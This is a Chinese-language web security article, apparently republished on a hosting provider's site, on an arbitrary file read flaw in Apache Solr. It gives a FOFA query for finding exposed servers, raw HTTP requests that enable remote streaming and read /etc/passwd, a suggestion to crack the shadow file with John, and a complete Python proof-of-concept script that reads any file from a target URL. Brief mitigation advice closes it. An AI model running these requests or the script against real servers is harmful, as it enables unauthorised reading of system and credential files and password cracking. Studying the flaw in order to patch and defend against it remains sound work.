您好,登錄后才能下訂單哦!
這篇文章主要為大家展示了“web安全中Apache Solr全版本任意文件讀取漏洞分析”,內(nèi)容簡(jiǎn)而易懂,條理清晰,希望能夠幫助大家解決疑惑,下面讓小編帶領(lǐng)大家一起研究并學(xué)習(xí)一下“web安全中Apache Solr全版本任意文件讀取漏洞分析”這篇文章吧。
Apache Solr 全版本存在任意文件讀取漏洞,攻擊者可以在未授權(quán)的情況下獲取目標(biāo)系統(tǒng)的敏感文件
全版本
fofa搜索標(biāo)題:app="Solr" || app=""Apache-Solr"
下載Solr進(jìn)行解壓縮:
https://solr.apache.org/downloads.html #solr下載
進(jìn)入Solr的bin目錄執(zhí)行命令:
./solr strat
訪問(wèn)url,出現(xiàn)如下頁(yè)面即為啟動(dòng)成功。
http://192.168.153.7:8983
此時(shí)啟動(dòng)的solr是沒(méi)有核心進(jìn)行索引和搜索的。
./solr create -c <name> # 創(chuàng)建一個(gè)數(shù)據(jù)驅(qū)動(dòng)模式的核心
訪問(wèn)url:
http://192.168.153.7:8983/solr/admin/cores?indexInfo=false&wt=json
burp數(shù)據(jù)包為:
GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1 Host: 192.168.153.7:8983 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
再使用burp進(jìn)行POST請(qǐng)求:
POST /solr/henry/config HTTP/1.1 Host: 192.168.153.7:8983 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 84 {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
當(dāng)出現(xiàn)"This response format is experimental. It is likely to change in the future." 表示存在漏洞。
進(jìn)行文件讀?。?/p>
POST /solr/henry/debug/dump?param=ContentStreams HTTP/1.1 Host: 192.168.153.7:8983 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 35 Content-Type: application/x-www-form-urlencoded stream.url=file:///etc/passwd
也可以讀取shadow文件然后進(jìn)行john爆破出密碼:
POC腳本:
(PeiQi師傅,永遠(yuǎn)的神!)
# coding=utf-8 # Apache Solr 全版本任意文件讀取 # Fofa:app="Apache-Solr" || app="Solr" import requests import json import sys import time def title(): print("+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+") print("+~~~~~~ Apache Solr 全版本任意文件讀取 ~~~~~~+") print("+~~~~~~ Use: python3 solr.py ~~~~~~+") print("+~~~~~~ url: http://x.x.x.x:port ~~~~~~+") print("+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+") time.sleep(2) def get_name(url): url_1 = url + "/solr/admin/cores?indexInfo=false&wt=json" try: res = requests.get(url=url_1) #將json數(shù)據(jù)python字典話 name = str(list(json.loads(res.text)["status"])[0]) print("[!] 獲取到目標(biāo)系統(tǒng)name:\033[31m%s\033[0m"%name+" [0]"+"URL:"+url+"/solr/"+name+"/config") return name except Exception as e: print("[!] 目標(biāo)URL無(wú)法進(jìn)行利用。",e) sys.exit(0) def check_vul(url,name): url_2 = url +"/solr/" + name + "/config" data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' try: res = requests.post(url=url_2,data=data) if "This response format" in res.text and res.status_code == 200: print("[!] \033[31m目標(biāo)系統(tǒng)存在漏洞\033[0m") else: print("[!] 目標(biāo)系統(tǒng)不存在漏洞") sys.exit(0) except Exception as e: print("[!] 目標(biāo)系統(tǒng)請(qǐng)求失敗") sys.exit(0) def read_files(url,name,file_name): url = url + "/solr/" + name + "/debug/dump?param=ContentStreams" # 此處必須要加content-type,否則讀取不到文件 headers = { "Content-Type" : "application/x-www-form-urlencoded" } data = "stream.url=file://{}".format(file_name) try: res = requests.post(url=url,headers=headers,data=data) if "No such file or directory" in res.text: print("[!] 目標(biāo)系統(tǒng)讀取文件失敗!") sys.exit(0) else: print("正在讀取文件..........") content = (json.loads(res.text)["streams"][0]["stream"]) print("[o] 讀取文件內(nèi)容為:\n\033[34m{}\033\0m".format(content)) except Exception as e: print("[!] 目標(biāo)系統(tǒng)似乎意外中斷了",e) sys.exit(0) if __name__ == "__main__": title() url = str(input("\n[!] 請(qǐng)輸入目標(biāo)系統(tǒng)URL: ")) name = get_name(url) check_vul(url,name) file_name = str(input("[!] 請(qǐng)輸入要讀取的文件:")) read_files(url,name,file_name)
由于目前官方不予修復(fù)該漏洞,暫無(wú)安全版本。
1. 開(kāi)啟身份驗(yàn)證/授權(quán)
2. 配置防火墻策略,確保Solr API(包括Admin UI)只有受信任的IP和用戶才能訪問(wèn)
3.禁止將Apache Solr放置在外網(wǎng)
以上是“web安全中Apache Solr全版本任意文件讀取漏洞分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對(duì)大家有所幫助,如果還想學(xué)習(xí)更多知識(shí),歡迎關(guān)注億速云行業(yè)資訊頻道!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。